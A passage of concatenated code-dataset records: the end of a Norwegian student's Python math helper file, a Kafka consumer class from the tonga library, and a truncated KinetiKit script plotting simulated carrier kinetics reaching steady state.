binær\n#representasjon av ascii-verdien til hvert tegn i parameterstringen\n#den vil legge på nuller forran tegn slik at alle tegnene vil ha\n#like mange siffer. Tanken var at også å reversere disse funskjonene\n#slik at man kunne ende opp med den opprinnelige strengen, men\n#jeg har ikke kommet så langt\ndef StringToBin(string):\n binList = MakeEvenList(CharToBin(StringToChar(string)))\n outString = ''\n for x in range(len(binList)):\n outString += binList[x]\n return outString\n\n#Denne tar fakultet av et tall (n!) \ndef Fakultet(tall):\n summen = 1\n for x in range(1,(tall+1)):\n summen = summen * x\n return summen\n\n#denne ble lagd med tanke på øvingen der du skulle finne antall nuller\n#på slutten av 100! denne funksjonen returnerer nemlig hvor mange nuller\n#som finnes på slutten av et tall.\n# TIPS: skriv \"FindEndZeros(Fakultet(100))\" for å finne antall nuller\n#på slutten av 100!\ndef FindEndZeros(tall):\n tall = str(tall)\n zero = 0\n for x in range(len(tall)):\n if(tall[x] == '0'):\n zero += 1\n else:\n zero = 0\n return zero\n\n#Denne funksjonen tar inn to tall og bruker den euklidske algoritmen\n#for å finne greatest common divisor\ndef gcd(tall1, tall2):\n a= tall1\n b= tall2\n holder = 0\n gcd = 0\n done = False\n while not done:\n holder = a\n a = b\n b = holder%b\n if(b==0):\n gcd = a\n done = True\n return gcd\n\n#denne finner least common multiple\ndef lcm(tall1, tall2):\n a = 2\n while True:\n if(a*tall1%tall2 ==0):\n break\n a += 1\n a = a*tall1\n return a\n\n#========================= updated 30.09.13 ===========================\n\n#tar inn to tall og deler de med greatest common divisor til tallene\n#returnerer tallene hver for seg\ndef ReduceFraction(tall1, tall2):\n divisor = gcd(tall1, tall2)\n tall1 = tall1 / divisor\n tall2 = tall2 / divisor\n return tall1, tall2\n\n\n#Denne returnerer en liste med en fibbonaccirekke frem til et gitt tall\ndef FibbonacciList(endNumber):\n fibList = []\n if(endNumber == 1):\n fibList = [0]\n \n elif(endNumber ==2):\n fibList = [0,1]\n else: \n fibList = [0,1] \n \n for x in range(2, endNumber+1):\n fibList.append(fibList[x-1] + fibList[x-2])\n\n return fibList\n \n \n\n\n\n\n\n","sub_path":"øving 6/BPfunctions.py","file_name":"BPfunctions.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151331097","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) Qotto, 2019\n\n\"\"\" KafkaConsumer class\n\nThis class consume event / command / result in Kafka topics.\n\nTodo:\n * In function listen_store_records, add commit store (later V2)\n\"\"\"\n\nimport asyncio\nimport json\nfrom logging import Logger, getLogger\nfrom typing import List, Dict, Any, Union\n\nfrom aiokafka import (AIOKafkaConsumer)\nfrom aiokafka.errors import (IllegalStateError, UnsupportedVersionError, CommitFailedError,\n KafkaError, KafkaTimeoutError)\nfrom kafka.errors import KafkaConnectionError\n\nfrom tonga.models.handlers.command.command_handler import BaseCommandHandler\nfrom tonga.models.handlers.event.event_handler import BaseEventHandler\nfrom tonga.models.handlers.result.result_handler import BaseResultHandler\nfrom tonga.models.records.base import BaseRecord\nfrom tonga.models.store.base import BaseStoreRecordHandler\nfrom tonga.models.store.store_record import StoreRecord\nfrom tonga.services.consumer.base import BaseConsumer\nfrom tonga.services.consumer.errors import (ConsumerConnectionError, AioKafkaConsumerBadParams,\n KafkaConsumerError, ConsumerKafkaTimeoutError,\n IllegalOperation, TopicPartitionError,\n NoPartitionAssigned, OffsetError, UnknownStoreRecordHandler,\n UnknownHandler, UnknownHandlerReturn,\n HandlerException, KafkaConsumerAlreadyStartedError,\n KafkaConsumerNotStartedError)\nfrom tonga.services.coordinator.assignors.statefulset_assignors import StatefulsetPartitionAssignor\nfrom tonga.services.coordinator.client.kafka_client import KafkaClient\nfrom tonga.services.coordinator.transaction.kafka_transaction import (KafkaTransactionalManager,\n KafkaTransactionContext)\nfrom tonga.services.errors import BadSerializer\nfrom tonga.services.serializer.base import BaseSerializer\nfrom tonga.services.serializer.kafka_key import KafkaKeySerializer\nfrom tonga.stores.manager.base import BaseStoreManager\nfrom tonga.stores.manager.errors import UninitializedStore\nfrom tonga.models.structs.positioning import (BasePositioning, KafkaPositioning)\n\n__all__ = [\n 'KafkaConsumer',\n]\n\n\nclass KafkaConsumer(BaseConsumer):\n \"\"\"KafkaConsumer is a client that publishes records to the Kafka cluster.\n \"\"\"\n _client: KafkaClient\n serializer: BaseSerializer\n _bootstrap_servers: Union[str, List[str]]\n _client_id: str\n _topics: List[str]\n _group_id: str\n _auto_offset_reset: str\n _max_retries: int\n _retry_interval: int\n _retry_backoff_coeff: int\n _isolation_level: str\n _assignors_data: Dict[str, Any]\n _store_manager: BaseStoreManager\n _running: bool\n _kafka_consumer: AIOKafkaConsumer\n _transactional_manager: KafkaTransactionalManager\n\n __current_offsets: Dict[str, BasePositioning]\n __last_offsets: Dict[str, BasePositioning]\n __last_committed_offsets: Dict[str, BasePositioning]\n\n _loop: asyncio.AbstractEventLoop\n logger: Logger\n\n def __init__(self, client: KafkaClient, serializer: BaseSerializer, topics: List[str],\n loop: asyncio.AbstractEventLoop, client_id: str = None, group_id: str = None,\n auto_offset_reset: str = 'earliest', max_retries: int = 10, retry_interval: int = 1000,\n retry_backoff_coeff: int = 2, assignors_data: Dict[str, Any] = None,\n store_manager: BaseStoreManager = None, isolation_level: str = 'read_uncommitted',\n transactional_manager: KafkaTransactionalManager = None) -> None:\n \"\"\"\n KafkaConsumer constructor\n\n Args:\n client (KafkaClient): Initialization class (contains, client_id / bootstraps_server)\n serializer (BaseSerializer): Serializer encode & decode event\n topics (List[str]): List of topics to subscribe to\n loop (asyncio.AbstractEventLoop): Asyncio loop\n client_id (str): Client name (if is none, KafkaConsumer use KafkaClient client_id)\n group_id (str): name of the consumer group, and to use for fetching and committing offsets.\n If None, offset commits are disabled\n auto_offset_reset (str): A policy for resetting offsets on OffsetOutOfRange errors: ‘earliest’ will move to\n the oldest available message, ‘latest’ will move to the most recent.\n Any other value will raise the exception\n max_retries (int): Number of retries before critical failure\n retry_interval (int): Interval before next retries\n retry_backoff_coeff (int): Backoff coeff for next retries\n assignors_data (Dict[str, Any]): Dict with assignors information, more details in\n StatefulsetPartitionAssignor\n store_manager (BaseStoreManager): If this store_manager is set, consumer call initialize_store_manager()\n otherwise listen_event was started\n isolation_level (str): Controls how to read messages written transactionally. If set to read_committed,\n will only return transactional messages which have been committed.\n If set to read_uncommitted, will return all messages, even transactional messages\n which have been aborted. Non-transactional messages will be returned unconditionally\n in either mode.\n\n Returns:\n None\n \"\"\"\n super().__init__()\n self.logger = getLogger('tonga')\n\n # Register KafkaClient\n self._client = client\n\n # Set default assignors_data if is None\n if assignors_data is None:\n assignors_data = {}\n\n # Create client_id\n if client_id is None:\n self._client_id = self._client.client_id + '-' + str(self._client.cur_instance)\n else:\n self._client_id = client_id\n\n if isinstance(serializer, BaseSerializer):\n self.serializer = serializer\n else:\n raise BadSerializer\n\n self._bootstrap_servers = self._client.bootstrap_servers\n self._topics = topics\n self._group_id = group_id\n self._auto_offset_reset = auto_offset_reset\n self._max_retries = max_retries\n self._retry_interval = retry_interval\n self._retry_backoff_coeff = retry_backoff_coeff\n self._isolation_level = isolation_level\n self._assignors_data = assignors_data\n self._store_manager = store_manager\n self._running = False\n self._loop = loop\n\n self.__current_offsets = dict()\n self.__last_offsets = dict()\n self.__last_committed_offsets = dict()\n\n self._transactional_manager = transactional_manager\n\n try:\n self.logger.info(json.dumps(assignors_data))\n statefulset_assignor = StatefulsetPartitionAssignor(bytes(json.dumps(assignors_data), 'utf-8'))\n self._kafka_consumer = AIOKafkaConsumer(*self._topics, loop=self._loop,\n bootstrap_servers=self._bootstrap_servers,\n client_id=self._client_id, group_id=group_id,\n value_deserializer=self.serializer.decode,\n auto_offset_reset=self._auto_offset_reset,\n isolation_level=self._isolation_level, enable_auto_commit=False,\n key_deserializer=KafkaKeySerializer.decode,\n partition_assignment_strategy=[statefulset_assignor])\n except KafkaError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise AioKafkaConsumerBadParams\n self.logger.debug('Create new consumer %s, group_id %s', self._client_id, group_id)\n\n async def start_consumer(self) -> None:\n \"\"\"\n Start consumer\n\n Returns:\n None\n\n Raises:\n AttributeError: KafkaConsumerError\n ValueError: If KafkaError or KafkaTimoutError is raised, exception value is contain\n in KafkaConsumerError.msg\n \"\"\"\n if self._running:\n raise KafkaConsumerAlreadyStartedError\n for retry in range(2):\n try:\n await self._kafka_consumer.start()\n self._running = True\n self.logger.debug('Start consumer : %s, group_id : %s, retry : %s', self._client_id, self._group_id,\n retry)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n await asyncio.sleep(1)\n except KafkaConnectionError as err:\n self.logger.exception('%s', err.__str__())\n await asyncio.sleep(1)\n except KafkaError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n else:\n break\n else:\n raise ConsumerConnectionError\n\n async def stop_consumer(self) -> None:\n \"\"\"\n Stop consumer\n\n Returns:\n None\n\n Raises:\n AttributeError: KafkaConsumerError\n ValueError: If KafkaError is raised, exception value is contain\n in KafkaConsumerError.msg\n \"\"\"\n if not self._running:\n raise KafkaConsumerNotStartedError\n try:\n await self._kafka_consumer.stop()\n self._running = False\n self.logger.debug('Stop consumer : %s, group_id : %s', self._client_id, self._group_id)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n raise ConsumerKafkaTimeoutError\n except KafkaError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n\n def is_running(self) -> bool:\n return self._running\n\n async def get_last_committed_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get last committed offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with last committed offsets\n \"\"\"\n last_committed_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get last committed offsets')\n if self._group_id is None:\n raise IllegalOperation\n for tp in self._kafka_consumer.assignment():\n offset = await self._kafka_consumer.committed(tp)\n last_committed_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n return last_committed_offsets\n\n async def get_current_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get current offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with current offsets\n \"\"\"\n current_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get current offsets')\n for tp in self._kafka_consumer.assignment():\n try:\n offset = await self._kafka_consumer.position(tp)\n current_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n return current_offsets\n\n async def get_beginning_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get beginning offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with beginning offsets\n \"\"\"\n beginning_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get beginning offsets')\n for tp in self._kafka_consumer.assignment():\n try:\n offset = (await self._kafka_consumer.beginning_offsets([tp]))[tp]\n beginning_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n raise ConsumerKafkaTimeoutError\n except UnsupportedVersionError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n return beginning_offsets\n\n async def get_last_offsets(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Get last offsets\n\n Returns:\n Dict[str, KafkaPositioning]: Contains all assigned partitions with last offsets\n \"\"\"\n last_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get last offsets')\n for tp in self._kafka_consumer.assignment():\n try:\n offset = (await self._kafka_consumer.end_offsets([tp]))[tp]\n last_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n raise ConsumerKafkaTimeoutError\n except UnsupportedVersionError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n return last_offsets\n\n async def load_offsets(self, mod: str = 'earliest') -> None:\n \"\"\"\n This method was call before consume topics, assign position to consumer\n\n Args:\n mod: Start position of consumer (earliest, latest, committed)\n\n Returns:\n None\n \"\"\"\n self.logger.debug('Load offset mod : %s', mod)\n if not self._running:\n await self.start_consumer()\n\n if mod == 'latest':\n await self.seek_to_end()\n elif mod == 'earliest':\n await self.seek_to_beginning()\n elif mod == 'committed':\n await self.seek_to_last_commit()\n else:\n raise KafkaConsumerError\n\n self.__current_offsets = await self.get_current_offsets()\n self.__last_offsets = await self.get_last_offsets()\n\n if self._group_id is not None:\n self.__last_committed_offsets = await self.get_last_committed_offsets()\n for key, kafka_positioning in self.__last_committed_offsets.items():\n if kafka_positioning.get_current_offset() is None:\n self.logger.debug('Seek to beginning, no committed offsets was found')\n await self.seek_to_beginning(kafka_positioning)\n\n async def debug_print_all_msg(self):\n \"\"\"\n Debug method, useful for display all msg was contained in assigned topic/partitions\n\n Returns:\n None\n \"\"\"\n while True:\n message = await self._kafka_consumer.getone()\n self.logger.info('----------------------------------------------------------------------------------------')\n self.logger.info('Topic %s, Partition %s, Offset %s, Key %s, Value %s, Headers %s',\n message.topic, message.partition, message.offset, message.key, message.value,\n message.headers)\n self.logger.info('----------------------------------------------------------------------------------------')\n\n async def listen_records(self, mod: str = 'earliest') -> None:\n \"\"\"\n Listens records from assigned topic / partitions\n\n Args:\n mod: Start position of consumer (earliest, latest, committed)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.load_offsets(mod)\n\n self.pprint_consumer_offsets()\n\n async for msg in self._kafka_consumer:\n # Debug Display\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n self.logger.debug('New Message on consumer %s, Topic %s, Partition %s, Offset %s, '\n 'Key %s, Value %s, Headers %s', self._client_id, msg.topic, msg.partition,\n msg.offset, msg.key, msg.value, msg.headers)\n self.pprint_consumer_offsets()\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n\n key = KafkaPositioning.make_class_assignment_key(msg.topic, msg.partition)\n self.__current_offsets[key].set_current_offset(msg.offset)\n if self._transactional_manager is not None:\n self._transactional_manager.set_ctx(KafkaTransactionContext(msg.topic, msg.partition,\n msg.offset, self._group_id))\n # self.last_offsets = await self.get_last_offsets()\n\n sleep_duration_in_ms = self._retry_interval\n for retries in range(0, self._max_retries):\n try:\n record_class = msg.value['record_class']\n handler_class = msg.value['handler_class']\n\n if handler_class is None:\n self.logger.debug('Empty handler')\n break\n\n self.logger.debug('Event name : %s Event content :\\n%s',\n record_class.event_name(), record_class.__dict__)\n\n # Calls handle if event is instance BaseHandler\n if isinstance(handler_class, BaseEventHandler):\n transactional = await handler_class.handle(event=record_class)\n elif isinstance(handler_class, BaseCommandHandler):\n transactional = await handler_class.execute(event=record_class)\n elif isinstance(handler_class, BaseResultHandler):\n transactional = await handler_class.on_result(event=record_class)\n else:\n # Otherwise raise KafkaConsumerUnknownHandler\n raise UnknownHandler\n\n # If result is none (no transactional process), check if consumer has an\n # group_id (mandatory to commit in Kafka)\n if transactional is None and self._group_id is not None:\n # Check if next commit was possible (Kafka offset)\n if self.__last_committed_offsets[key] is None or \\\n self.__last_committed_offsets[key].get_current_offset() <= \\\n self.__current_offsets[key].get_current_offset():\n\n self.logger.debug('Commit msg %s in topic %s partition %s offset %s',\n record_class.event_name(), msg.topic, msg.partition,\n self.__current_offsets[key].get_current_offset() + 1)\n tp = self.__current_offsets[key].to_topics_partition()\n await self._kafka_consumer.commit(\n {tp: self.__current_offsets[key].get_current_offset() + 1})\n self.__last_committed_offsets[key].set_current_offset(msg.offset + 1)\n\n # Transactional process no commit\n elif transactional:\n self.logger.debug('Transaction end')\n self.__current_offsets = await self.get_current_offsets()\n self.__last_committed_offsets = await self.get_last_committed_offsets()\n # Otherwise raise KafkaConsumerUnknownHandlerReturn\n elif transactional is None and self._group_id is None:\n pass\n else:\n raise UnknownHandlerReturn\n\n # Break if everything was successfully processed\n break\n except UninitializedStore as err:\n self.logger.exception('%s', err.__str__())\n retries = 0\n await asyncio.sleep(10)\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise OffsetError\n except CommitFailedError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n except (KafkaError, HandlerException) as err:\n self.logger.exception('%s', err.__str__())\n sleep_duration_in_s = int(sleep_duration_in_ms / 1000)\n await asyncio.sleep(sleep_duration_in_s)\n sleep_duration_in_ms = sleep_duration_in_ms * self._retry_backoff_coeff\n if retries not in range(0, self._max_retries):\n await self.stop_consumer()\n self.logger.error('Max retries, close consumer and exit')\n exit(1)\n\n async def _refresh_offsets(self) -> None:\n \"\"\"\n This method refresh __current_offsets / __last_offsets / __last_committed_offsets\n\n Returns:\n None\n \"\"\"\n self.logger.debug('Call refresh offsets')\n\n self.__current_offsets = await self.get_current_offsets()\n self.__last_offsets = await self.get_last_offsets()\n\n if self._group_id is not None:\n self.__last_committed_offsets = await self.get_last_committed_offsets()\n else:\n raise IllegalOperation\n\n async def check_if_store_is_ready(self) -> None:\n \"\"\" If store is ready consumer set store initialize flag to true\n\n Returns:\n None\n \"\"\"\n\n # Check if local store is initialize\n self.logger.info('Started check_if_store_is_ready')\n if not self._store_manager.get_local_store().get_persistency().is_initialize():\n key = KafkaPositioning.make_class_assignment_key(self._store_manager.get_topic_store(),\n self._client.cur_instance)\n if self.__last_offsets[key].get_current_offset() == 0:\n self._store_manager.__getattribute__('_initialize_local_store').__call__()\n self.logger.info('Local store was initialized')\n elif self.__current_offsets[key].get_current_offset() == self.__last_offsets[key].get_current_offset():\n self._store_manager.__getattribute__('_initialize_local_store').__call__()\n self.logger.info('Local store was initialized')\n\n # Check if global store is initialize\n if not self._store_manager.get_global_store().get_persistency().is_initialize():\n for key, positioning in self.__last_offsets.items():\n if self._client.cur_instance != positioning.get_partition():\n if positioning.get_current_offset() == 0:\n continue\n elif positioning.get_current_offset() == self.__current_offsets[key].get_current_offset():\n continue\n else:\n break\n else:\n self._store_manager.__getattribute__('_initialize_global_store').__call__()\n self.logger.info('Global store was initialized')\n\n async def listen_store_records(self, rebuild: bool = False) -> None:\n \"\"\"\n Listens events for store construction\n\n Args:\n rebuild (bool): if true consumer seek to fist offset for rebuild own state\n\n Returns:\n None\n \"\"\"\n if self._store_manager is None:\n raise KeyError\n\n self.logger.info('Start listen store records')\n\n await self.start_consumer()\n\n await self._store_manager.__getattribute__('_initialize_stores').__call__()\n\n if not self._running:\n raise KafkaConsumerError('Fail to start tongaConsumer', 500)\n\n # Check if store is ready\n await self._refresh_offsets()\n\n await self.check_if_store_is_ready()\n self.pprint_consumer_offsets()\n\n async for msg in self._kafka_consumer:\n positioning_key = KafkaPositioning.make_class_assignment_key(msg.topic, msg.partition)\n self.__current_offsets[positioning_key].set_current_offset(msg.offset)\n\n # Debug Display\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n self.logger.debug('New Message on consumer %s, Topic %s, Partition %s, Offset %s, '\n 'Key %s, Value %s, Headers %s', self._client_id, msg.topic, msg.partition,\n msg.offset, msg.key, msg.value, msg.headers)\n self.pprint_consumer_offsets()\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n\n # Check if store is ready\n await self.check_if_store_is_ready()\n\n sleep_duration_in_ms = self._retry_interval\n for retries in range(0, self._max_retries):\n try:\n record_class: BaseRecord = msg.value['record_class']\n handler_class: BaseStoreRecordHandler = msg.value['handler_class']\n\n self.logger.debug('Store event name : %s\\nEvent content :\\n%s\\n',\n record_class.event_name(), record_class.__dict__)\n\n positioning = self.__current_offsets[positioning_key]\n if self._client.cur_instance == msg.partition:\n # Calls local_state_handler if event is instance BaseStorageBuilder\n if rebuild and not self._store_manager.get_local_store().get_persistency().is_initialize():\n if isinstance(record_class, StoreRecord):\n self.logger.debug('Call local_store_handler')\n await handler_class.local_store_handler(store_record=record_class,\n positioning=positioning)\n else:\n raise UnknownStoreRecordHandler\n elif self._client.cur_instance != msg.partition:\n if isinstance(record_class, StoreRecord):\n self.logger.debug('Call global_store_handler')\n await handler_class.global_store_handler(store_record=record_class, positioning=positioning)\n else:\n raise UnknownStoreRecordHandler\n\n # Check if store is ready\n await self.check_if_store_is_ready()\n\n # Break if everything was successfully processed\n break\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise OffsetError\n except CommitFailedError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n except (KafkaError, HandlerException) as err:\n self.logger.exception('%s', err.__str__())\n sleep_duration_in_s = int(sleep_duration_in_ms / 1000)\n await asyncio.sleep(sleep_duration_in_s)\n sleep_duration_in_ms = sleep_duration_in_ms * self._retry_backoff_coeff\n if retries not in range(0, self._max_retries):\n await self.stop_consumer()\n self.logger.error('Max retries, close consumer and exit')\n exit(1)\n\n def is_lag(self) -> bool:\n \"\"\"\n Consumer has lag ?\n\n Returns:\n bool: True if consumer is lagging otherwise return false and consumer is up to date\n \"\"\"\n if self.__last_offsets == self.__current_offsets:\n return False\n return True\n\n async def seek_to_beginning(self, positioning: BasePositioning = None) -> None:\n \"\"\"\n Seek to fist offset, mod 'earliest'.\n If positioning is None consumer will seek all assigned partition to beginning\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.start_consumer()\n if positioning is not None:\n try:\n await self._kafka_consumer.seek_to_beginning(positioning.to_topics_partition())\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n self.logger.debug('Seek to beginning for topic : %s, partition : %s', positioning.get_partition(),\n positioning.get_partition())\n else:\n try:\n await self._kafka_consumer.seek_to_beginning()\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Seek to beginning for all topics & partitions')\n\n async def seek_to_end(self, positioning: BasePositioning = None) -> None:\n \"\"\"\n Seek to latest offset, mod 'latest'.\n If positioning is None consumer will seek all assigned partition to end\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.start_consumer()\n if positioning is not None:\n try:\n await self._kafka_consumer.seek_to_end(positioning.to_topics_partition())\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n self.logger.debug('Seek to end for topic : %s, partition : %s', positioning.get_topics(),\n positioning.get_partition())\n else:\n try:\n await self._kafka_consumer.seek_to_end()\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Seek to end for all topics & partitions')\n\n async def seek_to_last_commit(self, positioning: BasePositioning = None) -> None:\n \"\"\"\n Seek to last committed offsets, mod 'committed'\n If positioning is None consumer will seek all assigned partition to last committed offset\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number / offset number)\n\n Returns:\n None\n \"\"\"\n if self._group_id is None:\n raise IllegalOperation\n if not self._running:\n await self.start_consumer()\n if positioning:\n try:\n await self._kafka_consumer.seek_to_committed(positioning.to_topics_partition())\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n self.logger.debug('Seek to last committed for topic : %s, partition : %s', positioning.get_topics(),\n positioning.get_partition())\n else:\n try:\n await self._kafka_consumer.seek_to_committed()\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Seek to last committed for all topics & partitions')\n\n async def seek_custom(self, positioning: BasePositioning) -> None:\n \"\"\"\n Seek to custom offsets\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number / offset number)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.start_consumer()\n if positioning is not None:\n try:\n await self._kafka_consumer.seek(positioning.to_topics_partition(), positioning.get_current_offset())\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise OffsetError\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Custom seek for topic : %s, partition : %s, offset : %s',\n positioning.get_topics(), positioning.get_partition(), positioning.get_current_offset())\n else:\n raise KafkaConsumerError\n\n async def _make_manual_commit(self, to_commit: List[BasePositioning]):\n commits = {}\n for positioning in to_commit:\n commits[positioning.to_topics_partition()] = positioning.get_current_offset()\n\n await self._kafka_consumer.commit(commits)\n\n async def subscriptions(self) -> frozenset:\n \"\"\"\n Get list of subscribed topic\n\n Returns:\n frozenset: List of subscribed topic\n\n \"\"\"\n if not self._running:\n await self.start_consumer()\n return self._kafka_consumer.subscription()\n\n def pprint_consumer_offsets(self) -> None:\n \"\"\"\n Debug tool, print all consumer position\n\n Returns:\n None\n \"\"\"\n self.logger.debug('Client ID = %s', self._client_id)\n\n self.logger.debug('Current Offset = %s', [positioning.pprint() for key, positioning in\n self.__current_offsets.items()])\n self.logger.debug('Last Offset = %s', [positioning.pprint() for key, positioning in\n self.__last_offsets.items()])\n\n self.logger.debug('Last committed offset = %s', [positioning.pprint() for key, positioning in\n self.__last_committed_offsets.items()])\n\n def get_consumer(self) -> AIOKafkaConsumer:\n \"\"\"\n Get aiokafka consumer\n\n Returns:\n AIOKafkaConsumer: Current instance of AIOKafkaConsumer\n \"\"\"\n return self._kafka_consumer\n\n def get_offset_bundle(self) -> Dict[str, Dict[str, BasePositioning]]:\n \"\"\"\n Return a bundle with each assigned assigned topic/partition with current, latest, last committed\n topic/partition as dict\n\n Returns:\n Dict[str, Dict[TopicPartition, int]]: Contains current_offset / last_offset / last_committed_offset\n \"\"\"\n return {\n 'current_offset': self.__current_offsets.copy(),\n 'last_offset': self.__last_offsets.copy(),\n 'last_committed_offset': self.__last_committed_offsets.copy()\n }\n\n def get_current_offset(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Return current offset of each assigned topic/partition\n\n Returns:\n Dict[str, BasePositioning]: Dict contains current offset of each assigned partition\n \"\"\"\n return self.__current_offsets.copy()\n\n def get_last_offset(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Return last offset of each assigned topic/partition\n\n Returns:\n Dict[str, BasePositioning]: Dict contains latest offset of each assigned partition\n \"\"\"\n return self.__last_offsets.copy()\n\n def get_last_committed_offset(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Return last committed offset of each assigned topic/partition\n\n Returns:\n Dict[str, BasePositioning]: Dict contains last committed offset of each assigned partition\n \"\"\"\n return self.__last_committed_offsets.copy()\n","sub_path":"tonga/services/consumer/kafka_consumer.py","file_name":"kafka_consumer.py","file_ext":"py","file_size_in_byte":37718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"337777206","text":"\"\"\"\nUseful for visualizing how steady state is reached on a cycle-per-cycle basis.\nAuthor: Natalia Spitha\n\"\"\"\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom KinetiKit import sim, artists\nfrom KinetiKit import kit as kin_kit\n\nfrom KinetiKit.units import ns, ps\n\nplot_output = False\n\nvar_values = [1,2,3,4,5,6,7, 8, 9, 10, 11, 12] # values that the varied parameter will take\nirf_args = {'irf_type': 'GaussDiff',\n 'weighted' : True,\n 'fwhm': 30 * ps,\n 'tau': 700 *ps,\n 'b': 0.1,\n 'tau_wt': 60 *ps\n } \n\nto = sim.time.linear(period=12.5*ns, N = 1000, subsample=1)\ndtime = to['array'][::to['subsample']]\n\n# --- Simulation Params\nparams = {\n 'k_ann':2e8,\n 'k_dis': 1e9,\n 'k_rec': 1e4,\n 'cs': 0.2,\n}\nsystem = sim.systems.MonoRecX(**params)\nexcitation = sim.lib.Excitation()\n\n\nplt.figure()\nax = plt.subplot(111)\nax2 = ax.twinx()\nalphas = np.linspace(0.1,1,num=len(var_values))\nfor i, var_val in enumerate(var_values):\n excitation = excitation.updated_with(numcycles=var_val)\n transient, converged = sim.lib.refined_simulation(system, to, \n excitation,\n N_coarse=500,\n doubleSearch=False)\n transient = kin_kit.roll_by_array_shift(transient, dtime, 0.3*ns)\n\n rpl = system.PLsig(transient)\n \n pl = sim.lib.convolve_irf(rpl, dtime, irf_args)\n \n xs = transient[0]; es = transient[1]; hs = transient[2]\n \n xs /= 1e-14 #divide by excitation volume\n es /= 1e-14\n hs /= 1e-14\n\n alpha = alphas[i]\n ax.plot(dtime/ns, xs, color='blue', alpha=alpha, label=var_val)\n ax2.plot(dtime/ns, es, color='red', alpha = alpha,)\n\nif plot_output:\n ax.plot(dtime/ns, kin_kit.normalized(rpl), ':', color='black', linewidth=2, alpha=0.7, label='PL_signal')\n ax.plot(dtime/ns, kin_kit.normalized(pl), color='orange', linewidth=8, alpha=0.4, label='convolved PL')\n\nax.legend(loc=1)\nplt.title('Reaching Steady State Visualization')\nax.set_xlabel('Time (ns)')\nax.set_ylabel('Norm. X population', color='blue')\nax2.set_ylabel('Norm E/H population', color='red')\nax.set_yscale('log'); ax2.set_yscale('log'); ax2.set_xscale('log')\n# ax.set_ylim(0.0, 1.1)\n# 